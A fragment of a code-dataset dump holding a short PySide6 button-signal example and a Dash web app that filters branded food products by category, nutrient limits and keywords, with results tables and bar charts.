"sh.docker", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sh.docker.rm", "line_number": 50, "usage_type": "call"}, {"api_name": "sh.docker", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 54, "usage_type": "attribute"}]} +{"seq_id": "208749356", "text": "import sys\n\nfrom PySide6.QtWidgets import QApplication, QMainWindow, QPushButton\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n btn = QPushButton(\"Press me\")\n btn.setCheckable(True)\n btn.clicked.connect(\n lambda checked: self.button_clicked(checked, btn)\n )\n\n self.setCentralWidget(btn)\n\n def button_clicked(self, checked, btn):\n print(btn, checked)\n btn.hide()\n\n\napp 
= QApplication(sys.argv)\n\nwindow = MainWindow()\nwindow.show()\napp.exec()\n", "sub_path": "pyside6-source/further/signals_extra_1.py", "file_name": "signals_extra_1.py", "file_ext": "py", "file_size_in_byte": 543, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "PySide6.QtWidgets.QMainWindow", "line_number": 6, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 10, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QApplication", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "341729064", "text": "import dash_bootstrap_components as dbc\r\nimport dash_html_components as html\r\nimport dash_core_components as dcc\r\nfrom dash.dependencies import Input, Output, State\r\nimport dash\r\nimport dash_table\r\nimport dash_daq as daq\r\nimport pandas as pd\r\nimport plotly.express as px\r\n\r\n\r\nexternal_stylesheets = [dbc.themes.BOOTSTRAP]\r\napp = dash.Dash(__name__, external_stylesheets = external_stylesheets)\r\n\r\nmodal_clicks = 0\r\n\r\ndf = pd.read_pickle('df_app.pkl')\r\n\r\ndef find_products(data_frame: pd.DataFrame, \r\n branded_food_cat: str, \r\n nutrient_prefs: list, \r\n desc_kw: str, \r\n ingred_kw: str) -> pd.DataFrame:\r\n\r\n \"\"\"This function filters out products that don't match the provided preferences\"\"\"\r\n\r\n data_frame = data_frame[data_frame.branded_food_category == branded_food_cat] # filter the food category\r\n\r\n for nutrient_condition in nutrient_prefs: # nutrient conditions are provided in a tuple format: (<nutrient name>, <'min'/'max'>, <amount>)\r\n \r\n if nutrient_condition[1] == 'max':\r\n data_frame = data_frame[data_frame['nutr_amnt'].apply(lambda x: x[nutrient_condition[0]][0] <= nutrient_condition[2] if nutrient_condition[0] in x.keys() else False)]\r\n \r\n elif nutrient_condition[1] == 'min':\r\n data_frame = data_frame[data_frame['nutr_amnt'].apply(lambda x: x[nutrient_condition[0]][0] >= nutrient_condition[2] if nutrient_condition[0] in x.keys() else False)]\r\n \r\n if desc_kw is not None: # keeping only the products that contain the provided keyword in their description\r\n data_frame = data_frame[data_frame['description'].apply(lambda x: desc_kw in x.lower() if not pd.isnull(x) else False)]\r\n\r\n if ingred_kw is not None: # keeping only the products that contain the provided keyword in their ingredients list\r\n data_frame = data_frame[data_frame['ingredients'].apply(lambda x: ingred_kw in x.lower() if not pd.isnull(x) else False)]\r\n \r\n return data_frame\r\n\r\n# Creating a dictionary with the Main Categories as keys and their lists of Sub-Categories as values\r\nall_options = {}\r\nfor i in df.MainCategory.dropna().unique():\r\n all_options[i] = [j for j in df[df.MainCategory == i]['SubCategory'].unique()]\r\n\r\n# Creating a dictionary with the Sub-Categories as keys and their lists of Categories as values\r\nall_options_sub = {}\r\nfor i in df.SubCategory.dropna().unique():\r\n all_options_sub[i] = [j for j in df[df.SubCategory == i]['branded_food_category'].unique()]\r\n\r\n# The above dictionaries are used in the callbacks of the category dropdown menus.\r\n\r\n\r\napp.layout = html.Div(\r\n [ \r\n dbc.Row( # The first row of the layout, contains the image of the logo and the header.\r\n [\r\n\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.Img(src='/assets/HeaderB.png')\r\n ]\r\n ),\r\n width={'size':12, 'offset':0},\r\n )\r\n ]\r\n ),\r\n\r\n dbc.Row( # The second row of the 
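The PySide6 record forwards the checked flag plus the button itself through a lambda. When connecting several buttons in a loop, the same idea needs a default-argument capture, otherwise every handler late-binds to the last loop value. A short sketch assuming PySide6 is installed (illustrative names, not the record's code):

import sys
from PySide6.QtWidgets import QApplication, QPushButton

app = QApplication(sys.argv)
buttons = [QPushButton("Button {}".format(i)) for i in range(3)]
for btn in buttons:
    # b=btn freezes the current button; a bare `btn` in the body would resolve to the last one
    btn.clicked.connect(lambda checked, b=btn: print(b.text(), checked))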
layout contains the images of the instructions.\r\n [\r\n dbc.Col(\r\n html.Div( \r\n [\r\n html.Img(src='/assets/BannerA.jpg'),\r\n ]\r\n ),\r\n width={'size':2, 'offset':0}\r\n ),\r\n\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.Img(src='/assets/BannerB.jpg')\r\n \r\n ]\r\n ),\r\n width={'size':2, 'offset':4}\r\n )\r\n ]\r\n ),\r\n\r\n dbc.Row( # The third row contains all the inputs, plus the \"See Results\" button at the end.\r\n [\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.H5('Menu'),\r\n dcc.RadioItems( # Radio items input for the Main categories.\r\n id='radio_menu',\r\n options=[{'label': k, 'value': k} for k in all_options.keys()],\r\n labelStyle={'display': 'block','margin-left':'20px'},\r\n inputStyle={\"margin-right\": \"10px\"}\r\n )\r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={\"size\": 2, \"order\": 1, \"offset\": 0}, \r\n ),\r\n\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.H5('Select Category'),\r\n dcc.Dropdown(\r\n id='cat_dropdown', \r\n options=[{'label': i, 'value': i} for i in df['SubCategory'].dropna().unique()]\r\n # The available options are changed after a Main Category is selected. See first callback.\r\n ),\r\n html.Br(),\r\n html.Br(),\r\n\r\n html.H5('Select Sub-Category'),\r\n dcc.Dropdown(\r\n id='subcat_dropdown', \r\n options=[{'label': i, 'value': i} for i in df['branded_food_category'].dropna().unique()]\r\n # The available options are changed after a Sub-Category is selected. See second callback.\r\n ),\r\n html.Br(style={'margin': '4px'})\r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={\"size\": 2, \"order\": 2, \"offset\": 0},\r\n ),\r\n\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.H5(id='table_title'),\r\n html.Table( # A table containing some statistics for the selected category. Controlled by the third callback.\r\n id='cat_stats',\r\n style={'border': '1px solid brown', 'background':'#eaeec6'}\r\n ),\r\n html.Br()\r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={'size':2, 'order':3}\r\n ),\r\n\r\n dbc.Col(\r\n html.Div( # Contains three dropdown menus for nutrient preferences.\r\n [\r\n html.H5('Filter Nutrients'),\r\n\r\n dcc.Dropdown(\r\n id='dropdown_nutrient', \r\n options=[\r\n {'label': 'Calories', 'value': 'Energy'},\r\n {'label': 'Sugars', 'value': 'Sugars, total including NLEA'},\r\n {'label': 'Fat', 'value': 'Total lipid (fat)'},\r\n {'label': 'Protein', 'value': 'Protein'},\r\n {'label': 'Fiber', 'value': 'Fiber, total dietary'},\r\n {'label': 'Folic acid', 'value': 'Folic acid'}\r\n ]\r\n ),\r\n\r\n html.Br(),\r\n\r\n dcc.Dropdown(\r\n id='dropdown_nutrient_2', \r\n options=[\r\n {'label': 'Calories', 'value': 'Energy'},\r\n {'label': 'Sugars', 'value': 'Sugars, total including NLEA'},\r\n {'label': 'Fat', 'value': 'Total lipid (fat)'},\r\n {'label': 'Protein', 'value': 'Protein'},\r\n {'label': 'Fiber', 'value': 'Fiber, total dietary'},\r\n {'label': 'Folic acid', 'value': 'Folic acid'}\r\n ]\r\n ),\r\n\r\n html.Br(),\r\n\r\n dcc.Dropdown(\r\n id='dropdown_nutrient_3', \r\n options=[\r\n {'label': 'Calories', 'value': 'Energy'},\r\n {'label': 'Sugars', 'value': 'Sugars, total including NLEA'},\r\n {'label': 'Fat', 'value': 'Total lipid (fat)'},\r\n {'label': 'Protein', 'value': 'Protein'},\r\n {'label': 'Fiber', 'value': 'Fiber, total dietary'},\r\n {'label': 'Folic acid', 'value': 'Folic acid'}\r\n ]\r\n ),\r\n\r\n html.Br(style={'margin': '3px'})\r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={\"size\": 1, \"order\": 4, \"offset\": 0},\r\n ),\r\n \r\n dbc.Col(\r\n 
html.Div( # Contains three min/max radio items, one for each nutrient dropdown menu.\r\n [\r\n html.H5('Method'),\r\n\r\n dcc.RadioItems(\r\n id='radio_min_max',\r\n options=[\r\n {'label': 'Min', 'value': 'min'},\r\n {'label': 'Max', 'value': 'max'}\r\n ],\r\n value='min',\r\n labelStyle={'display': 'inline-block', 'margin-left':'20px'},\r\n inputStyle={\"margin-right\": \"5px\"}\r\n ),\r\n\r\n html.Br(style={'margin': '3px'}),\r\n\r\n dcc.RadioItems(\r\n id='radio_min_max_2',\r\n options=[\r\n {'label': 'Min', 'value': 'min'},\r\n {'label': 'Max', 'value': 'max'}\r\n ],\r\n value='min',\r\n labelStyle={'display': 'inline-block', 'margin-left':'20px'},\r\n inputStyle={\"margin-right\": \"5px\"}\r\n ),\r\n\r\n html.Br(style={'margin': '6px'}),\r\n\r\n dcc.RadioItems(\r\n id='radio_min_max_3',\r\n options=[\r\n {'label': 'Min', 'value': 'min'},\r\n {'label': 'Max', 'value': 'max'}\r\n ],\r\n value='min',\r\n labelStyle={'display': 'inline-block', 'margin-left':'20px'},\r\n inputStyle={\"margin-right\": \"5px\"}\r\n ),\r\n\r\n html.Br() \r\n\r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={\"size\": 1, \"order\": 5, \"offset\": 0},\r\n ),\r\n\r\n dbc.Col(\r\n html.Div( # Contains three numeric inputs, one for each nutrient dropdown.\r\n [\r\n html.H5('Set amounts'),\r\n\r\n daq.NumericInput(\r\n id='min_max_amount',\r\n min=0,\r\n max=1000,\r\n size=80,\r\n value=0\r\n ),\r\n\r\n html.Br(style={'margin': '1px'}),\r\n\r\n daq.NumericInput(\r\n id='min_max_amount_2',\r\n min=0,\r\n max=1000,\r\n size=80,\r\n value=0\r\n ),\r\n\r\n html.Br(style={'margin': '1px'}),\r\n\r\n daq.NumericInput(\r\n id='min_max_amount_3',\r\n min=0,\r\n max=1000,\r\n size=80,\r\n value=0\r\n ),\r\n\r\n html.Br()\r\n\r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={\"size\": 1, \"order\": 6, \"offset\": 0},\r\n ),\r\n\r\n dbc.Col(\r\n html.Div( # Contains the ingredient keyword input and the description keyword input.\r\n [\r\n html.H5('Ingredient keyword'),\r\n\r\n dcc.Input(\r\n id='ingred_kw'\r\n ),\r\n\r\n html.Br(),\r\n html.Br(),\r\n html.Br(),\r\n html.Br(),\r\n\r\n html.H5('Description keyword'),\r\n\r\n dcc.Input(\r\n id='desc_kw'\r\n ),\r\n\r\n html.Br(),\r\n html.Br() \r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={'size':2, 'order':7}\r\n ),\r\n\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.Button( \r\n id='button', \r\n n_clicks = 0,\r\n style={\r\n 'background-color': 'transparent',\r\n 'height': '218px',\r\n 'width': '175px',\r\n 'font-size': '26px'\r\n },\r\n hidden=True\r\n )\r\n ],\r\n style={'background-image': 'url(/assets/SeeResults.png)'}\r\n ),\r\n width={'size':1, 'order':8}\r\n )\r\n\r\n ],\r\n no_gutters=True, # reduces the space between the columns.\r\n align='start',\r\n ),\r\n \r\n dbc.Row( # The fourth row contains the presentation of the results: one table and one graph.\r\n [\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.H4('Results'), \r\n html.H6('(ordered by lowest amount of unfavourable nutrients | nutrient amounts are per 100g)')\r\n ]\r\n ),\r\n\r\n dash_table.DataTable( # The table contains all the products that match the provided preferences.\r\n id='table_data',\r\n style_cell={\r\n 'whiteSpace': 'normal',\r\n 'height': 'auto',\r\n 'textAlign': 'left', \r\n 'border': '1px solid brown'\r\n },\r\n style_header={\r\n 'backgroundColor':'#eaeec6',\r\n 'fontWeight': 'bold'\r\n },\r\n style_table={\r\n 'height':'500px', \r\n 'overflowY': 'auto'\r\n },\r\n style_cell_conditional=[\r\n {'if': {'column_id': 
'Ingredients'},\r\n 'width': '35%'}\r\n ]\r\n )\r\n ]\r\n ),\r\n width={'size':6, 'offset':0}\r\n ),\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.H4('Comparison of the Top Results'),\r\n\r\n html.Br(),\r\n\r\n dcc.Graph( # The graph compares the top results.\r\n id='main_graph')\r\n ]\r\n ),\r\n width={'size':6, 'offset':0}\r\n ),\r\n\r\n dbc.Modal( # This modal pops up when there are no products that match the given preferences.\r\n [\r\n dbc.ModalHeader(\"Alert!\"),\r\n dbc.ModalBody(\"No products match the specified filters.\"),\r\n dbc.ModalFooter(\r\n dbc.Button(\"Close\", id=\"close_modal\", className=\"ml-auto\", n_clicks=0)\r\n ),\r\n ],\r\n id=\"modal\",\r\n ),\r\n ]\r\n \r\n )\r\n \r\n ],\r\n)\r\n\r\n@app.callback( # Adjusts the available options of the Category dropdown based on the selection from the Menu.\r\n Output('cat_dropdown', 'options'),\r\n Input('radio_menu', 'value')\r\n)\r\n\r\ndef update_cat_options(main_cat):\r\n\r\n if not pd.isnull(main_cat):\r\n\r\n return [{'label': i, 'value': i} for i in all_options[main_cat]]\r\n\r\n else:\r\n\r\n return [{'label':j, 'value':j} for j in df.SubCategory.dropna().unique()]\r\n\r\n@app.callback( # Adjusts the available options of the Sub-Category dropdown based on the selection of the Category.\r\n Output('subcat_dropdown', 'options'),\r\n Input('cat_dropdown', 'value')\r\n)\r\n\r\ndef update_subcat_options(sub_cat):\r\n\r\n if not pd.isnull(sub_cat):\r\n\r\n return [{'label': i, 'value': i} for i in all_options_sub[sub_cat]]\r\n\r\n else:\r\n\r\n return [{'label':j, 'value':j} for j in df.branded_food_category.dropna().unique()]\r\n\r\n@app.callback( # Enables the \"See Results\" button and fills the category analysis table.\r\n Output('button', 'hidden'),\r\n Output('cat_stats', 'children'),\r\n Output('table_title', 'children'),\r\n Input('subcat_dropdown', 'value')\r\n)\r\n\r\ndef enable_button(sbcat_selection):\r\n\r\n if not pd.isnull(sbcat_selection): # Means a category has been selected, therefore the button should be shown, and the table filled.\r\n\r\n # First, preparing the statistics that will be included in the table of the Category analysis.\r\n df_subcat = df.loc[(df.branded_food_category == sbcat_selection), :]\r\n\r\n df_subcat.loc[:, 'Calories'] = df_subcat['nutr_amnt'].apply(lambda x: x['Energy'][0] if 'Energy' in x.keys() else 0)\r\n df_subcat.loc[:, 'Protein'] = df_subcat['nutr_amnt'].apply(lambda x: x['Protein'][0] if 'Protein' in x.keys() else 0)\r\n df_subcat.loc[:, 'Fiber'] = df_subcat['nutr_amnt'].apply(lambda x: x['Fiber, total dietary'][0] if 'Fiber, total dietary' in x.keys() else 0)\r\n df_subcat.loc[:, 'Sugars'] = df_subcat['nutr_amnt'].apply(lambda x: x['Sugars, total including NLEA'][0] if 'Sugars, total including NLEA' in x.keys() else 0)\r\n df_subcat.loc[:, 'Fat'] = df_subcat['nutr_amnt'].apply(lambda x: x['Total lipid (fat)'][0] if 'Total lipid (fat)' in x.keys() else 0)\r\n \r\n df_subcat = df_subcat[['Calories', 'Protein', 'Fiber', 'Sugars', 'Fat']]\r\n df_subcat_agg = df_subcat.agg(['mean', 'median', 'std', 'max', 'min']).round(1).reset_index().rename(columns={'index':'stat'})\r\n\r\n # Creating the children of the html.Table element.\r\n table_children = [\r\n html.Tr(\r\n [html.Th(col, style={'border': '1px solid brown'}) for col in df_subcat_agg.columns]\r\n )\r\n ] \r\n table_children.extend(\r\n [\r\n html.Tr(\r\n [html.Td(df_subcat_agg.iloc[i][col], style={'border': '1px solid brown'}) for col in df_subcat_agg.columns]\r\n ) for i in range(len(df_subcat_agg))\r\n ]\r\n 
)\r\n\r\n return False, table_children, sbcat_selection\r\n\r\n else: # Means a category has not been selected yet, therefore the button should be hidden. The table is filled with zeros.\r\n empty_table = df.loc[:2, :]\r\n\r\n empty_table.loc[:, 'Calories'] = empty_table['nutr_amnt'].apply(lambda x: x['Energy'][0] if 'Energy' in x.keys() else 0)\r\n empty_table.loc[:, 'Protein'] = empty_table['nutr_amnt'].apply(lambda x: x['Protein'][0] if 'Protein' in x.keys() else 0)\r\n empty_table.loc[:, 'Fiber'] = empty_table['nutr_amnt'].apply(lambda x: x['Fiber, total dietary'][0] if 'Fiber, total dietary' in x.keys() else 0)\r\n empty_table.loc[:, 'Sugars'] = empty_table['nutr_amnt'].apply(lambda x: x['Sugars, total including NLEA'][0] if 'Sugars, total including NLEA' in x.keys() else 0)\r\n empty_table.loc[:, 'Fat'] = empty_table['nutr_amnt'].apply(lambda x: x['Total lipid (fat)'][0] if 'Total lipid (fat)' in x.keys() else 0)\r\n\r\n empty_table = empty_table.loc[:,['Calories', 'Protein', 'Fiber', 'Sugars', 'Fat']]\r\n empty_table = empty_table.agg(['mean', 'median', 'std', 'max', 'min']).round().reset_index().rename(columns={'index':'stat'})\r\n\r\n empty_table_children= [\r\n html.Tr(\r\n [html.Th(col, style={'border': '1px solid brown'}) for col in empty_table.columns]\r\n )\r\n ] \r\n empty_table_children.extend(\r\n [\r\n html.Tr(\r\n [html.Td(0, style={'border': '1px solid brown'}) for col in empty_table.columns]\r\n ) for i in range(len(empty_table))\r\n ]\r\n )\r\n\r\n return True, empty_table_children, 'Category Analysis'\r\n\r\n@app.callback( # Main callback, controls the results table, the graph and the modal. It's activated when the \"See Results\" button is clicked.\r\n Output('table_data', 'data'),\r\n Output('table_data', 'columns'),\r\n Output('main_graph', 'figure'),\r\n Output('modal', 'is_open'),\r\n [Input('button', 'n_clicks'), Input('close_modal', 'n_clicks')],\r\n [\r\n State('subcat_dropdown', 'value'),\r\n State('dropdown_nutrient', 'value'),\r\n State('dropdown_nutrient_2', 'value'),\r\n State('dropdown_nutrient_3', 'value'),\r\n State('radio_min_max', 'value'),\r\n State('radio_min_max_2', 'value'),\r\n State('radio_min_max_3', 'value'),\r\n State('min_max_amount', 'value'),\r\n State('min_max_amount_2', 'value'),\r\n State('min_max_amount_3', 'value'),\r\n State('ingred_kw', 'value'),\r\n State('desc_kw', 'value')\r\n ]\r\n)\r\n\r\ndef update_table(n_clicks, n_clicks_close_modal, category, nutr1, nutr2, nutr3, min_max1, min_max2, min_max3, amnt1, amnt2, amnt3, ingred_kw, desc_kw):\r\n \r\n cols = ['description', 'ingredients', 'brand_owner', 'calories', 'sugars', 'fat', 'protein', 'fiber', 'folic_acid', 'bad_nutrients']\r\n formal_cols = ['Description', 'Ingredients', 'Company', 'Calories (kcal)', 'Sugars (g)',\r\n 'Fat (g)', 'Protein (g)', 'Fiber (g)', 'Folic acid (μg)', 'Unfavourable nutrients']\r\n\r\n if n_clicks != 0: # The button is clicked.\r\n\r\n # The following if statements check how many of the three nutrient preference inputs have been filled.\r\n # If the second is filled, then the third is checked. If the third is not filled, only the first two are considered.\r\n # If the second is not filled, then the first is checked. 
If the first is not filled either, no nutrient preferences are considered.\r\n # The try/except blocks catch the errors raised when processing an empty dataframe (no matching products).\r\n\r\n if not pd.isnull(nutr2):\r\n \r\n if not pd.isnull(nutr3): # All three are filled.\r\n test = find_products(\r\n data_frame=df, \r\n branded_food_cat = category, \r\n nutrient_prefs=[(nutr1, min_max1, amnt1), (nutr2, min_max2, amnt2), (nutr3, min_max3, amnt3)],\r\n desc_kw=desc_kw,\r\n ingred_kw=ingred_kw)\r\n\r\n try:\r\n test = test[cols]\r\n test = test.rename(columns=dict(zip(cols, formal_cols))).sort_values(by='Unfavourable nutrients', ascending=True)\r\n\r\n data = test.to_dict('records')\r\n columns = [{\"name\": i, \"id\": i} for i in test.columns]\r\n\r\n except:\r\n pass\r\n\r\n else: # First and second are filled.\r\n\r\n test = find_products(\r\n data_frame=df,\r\n branded_food_cat = category, \r\n nutrient_prefs=[(nutr1, min_max1, amnt1), (nutr2, min_max2, amnt2)],\r\n desc_kw=desc_kw,\r\n ingred_kw=ingred_kw)\r\n\r\n try:\r\n test = test[cols]\r\n test = test.rename(columns=dict(zip(cols, formal_cols))).sort_values(by='Unfavourable nutrients', ascending=True)\r\n\r\n\r\n data = test.to_dict('records')\r\n columns = [{\"name\": i, \"id\": i} for i in test.columns]\r\n\r\n except:\r\n pass\r\n\r\n elif not pd.isnull(nutr1): # Only the first is filled.\r\n\r\n test = find_products(\r\n data_frame=df, \r\n branded_food_cat = category, \r\n nutrient_prefs=[(nutr1, min_max1, amnt1)],\r\n desc_kw=desc_kw,\r\n ingred_kw=ingred_kw)\r\n try:\r\n test = test[cols]\r\n test = test.rename(columns=dict(zip(cols, formal_cols))).sort_values(by='Unfavourable nutrients', ascending=True)\r\n\r\n\r\n data = test.to_dict('records')\r\n columns = [{\"name\": i, \"id\": i} for i in test.columns]\r\n\r\n except:\r\n pass\r\n\r\n else:\r\n\r\n test = df[df.branded_food_category == category]\r\n\r\n try:\r\n test = test[cols]\r\n test = test.rename(columns=dict(zip(cols, formal_cols))).sort_values(by='Unfavourable nutrients', ascending=True)\r\n\r\n\r\n data = test.to_dict('records')\r\n columns = [{\"name\": i, \"id\": i} for i in test.columns]\r\n\r\n except:\r\n pass \r\n\r\n if len(test) == 0: # No matching products. Modal must pop up.\r\n\r\n modal_open = True\r\n\r\n global modal_clicks\r\n\r\n if n_clicks_close_modal > modal_clicks: # Making the \"close\" button of the modal functional.\r\n\r\n modal_open = False\r\n modal_clicks += 1\r\n\r\n return data, columns, {}, modal_open\r\n\r\n n_products = min(5, len(test)) # Comparing 5 products at most.\r\n avg_cat = df.groupby('branded_food_category')[['calories', 'protein', 'fiber', 'sugars', 'fat', 'folic_acid']].mean()\r\n\r\n # Creating a dictionary that will serve as the source of the visualization dataframe.\r\n # The 'names' entries are prepared in such a way as to be suitable for the plot legend.\r\n d = {'names': [f'{i}. 
' + name + ' - ' + brand for i, name, brand in zip(range(1, n_products+1), test.Description.fillna('-').values[:n_products], test.Company.fillna('-').values[:n_products])] + [category + ' average'],\r\n 'Calories (kcal)': [calorie for calorie in test['Calories (kcal)'].values[:n_products]] + [avg_cat.loc[category, :].calories],\r\n 'Protein (g)': [prot for prot in test['Protein (g)'].values[:n_products]] + [avg_cat.loc[category, :].protein],\r\n 'Fiber (g)': [fiber for fiber in test['Fiber (g)'].values[:n_products]] + [avg_cat.loc[category, :].fiber],\r\n 'Sugars (g)': [sugar for sugar in test['Sugars (g)'].values[:n_products]] + [avg_cat.loc[category, :].sugars],\r\n 'Fat (g)' : [fat for fat in test['Fat (g)'].values[:n_products]] + [avg_cat.loc[category, :].fat],\r\n 'Folic acid (μg)': [folic for folic in test['Folic acid (μg)'].values[:n_products]] + [avg_cat.loc[category, :]['folic_acid']]\r\n }\r\n\r\n # Creating the visualization dataframe from the previous dictionary.\r\n # Using pd.melt() to unpivot the data and make it more suitable for the px.bar function.\r\n viz_df = pd.melt(pd.DataFrame(d), id_vars='names', value_vars=['Calories (kcal)', 'Protein (g)', 'Fiber (g)', 'Sugars (g)', 'Fat (g)', 'Folic acid (μg)'])\r\n col_seq = ['#333131', '#615F5F', '#878686', '#A29F9F', '#C4C2C2', '#FF6666'] # Color sequences of the barplot.\r\n\r\n fig = px.bar(data_frame= viz_df, x='names', y='value', facet_col='variable', \r\n color='names', labels={'names':'', 'value':''}, \r\n #title= 'Product Comparison' + ' - ' ,\r\n facet_col_spacing=0.05, height=600,\r\n facet_col_wrap=3, facet_row_spacing=0.15, color_discrete_sequence=col_seq[:n_products]+[col_seq[-1]])\r\n\r\n fig.update_yaxes(matches=None, showticklabels=True)\r\n fig.update_xaxes(showticklabels=False)\r\n fig.update_layout(legend = dict(yanchor='top', y=1.1+n_products/7, xanchor='left', x=0))\r\n fig.for_each_annotation(lambda a: a.update(text=a.text.replace(\"variable=\", \"\")))\r\n\r\n modal_open = False \r\n\r\n return data, columns, fig, modal_open\r\n\r\n else: # The initial state of the table and the graph. 
When the app opens, they are both empty.\r\n\r\n empty_cols = [{\"name\": i, \"id\": i} for i in df[cols].rename(columns=dict(zip(cols, formal_cols))).columns]\r\n d = [dict(zip(formal_cols, ['' for i in range(len(formal_cols))]))]\r\n\r\n return d, empty_cols, {}, False\r\n\r\nif __name__ == \"__main__\":\r\n app.run_server(debug=True)", "sub_path": "app/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 30889, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "dash_bootstrap_components.themes", "line_number": 12, "usage_type": "attribute"}, {"api_name": "dash.Dash", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pandas.isnull", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 23, "usage_type": "attribute"}, {"api_name": "dash_html_components.Div", "line_number": 58, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 60, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 63, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 64, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 66, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 74, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 76, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 77, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 79, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 85, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 86, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 88, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 97, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 99, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 100, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 102, "usage_type": "call"}, {"api_name": "dash_core_components.RadioItems", "line_number": 103, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 115, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 116, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 118, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 119, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 124, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 125, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 127, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 128, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 133, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 140, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 141, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 143, 
"usage_type": "call"}, {"api_name": "dash_html_components.Table", "line_number": 144, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 155, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 156, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 158, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 160, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 172, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 174, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 186, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 188, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 200, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 207, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 208, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 210, "usage_type": "call"}, {"api_name": "dash_core_components.RadioItems", "line_number": 212, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 223, "usage_type": "call"}, {"api_name": "dash_core_components.RadioItems", "line_number": 225, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 236, "usage_type": "call"}, {"api_name": "dash_core_components.RadioItems", "line_number": 238, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 249, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 257, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 258, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 260, "usage_type": "call"}, {"api_name": "dash_daq.NumericInput", "line_number": 262, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 270, "usage_type": "call"}, {"api_name": "dash_daq.NumericInput", "line_number": 272, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 280, "usage_type": "call"}, {"api_name": "dash_daq.NumericInput", "line_number": 282, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 290, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 298, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 299, "usage_type": "call"}, {"api_name": "dash_html_components.H5", 